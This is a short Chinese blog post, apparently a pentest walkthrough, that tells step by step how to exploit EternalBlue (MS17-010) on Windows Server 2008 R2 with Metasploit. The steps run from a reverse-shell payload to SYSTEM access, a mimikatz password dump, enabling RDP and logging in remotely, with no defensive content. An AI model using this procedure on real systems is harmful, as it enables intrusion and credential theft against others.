0
点赞
收藏
分享

微信扫一扫

永恒之蓝445 拿下服务器

RIOChing 2022-03-12 阅读 36

上文提到内网渗透的时候发现服务器开启了445 接口

目标系统windows server 2008R2 x64
首先ping目标ip,连接通畅
使用service postgresql restart开启postgresql数据库

msfdb init初始化msf框架
msfconsole 打开msf控制台

msf框架db_nmap扫描端口得知目标开启了445端口,445为高危漏洞 ,可能存在永恒之蓝漏洞
search ms17(永恒之蓝编号)查找auxiliary验证payload
验证表明有很大几率存在永恒之蓝

search ms17 选择exploits攻击模块,为防止目标防火墙拦截通过show payloads 寻找reverse反向payload

set payload替换反弹payload
options设置lhost本地反弹链接
run启动

攻击成功。getuid查看获得 system权限
load mimikatz 加载猕猴桃板块使用kerberos抓取权限 获取到账户密码

background 将会话放到后台

nmap扫3389端口发现未开放

seaech enable_rdp (3389专用post后渗透攻击模块)
options设置session
run执行
nmap扫描ip发现3389已开
rdesktop 目标ip 用账户名密码远程登录成功….开始为所欲为

举报

相关推荐

0 条评论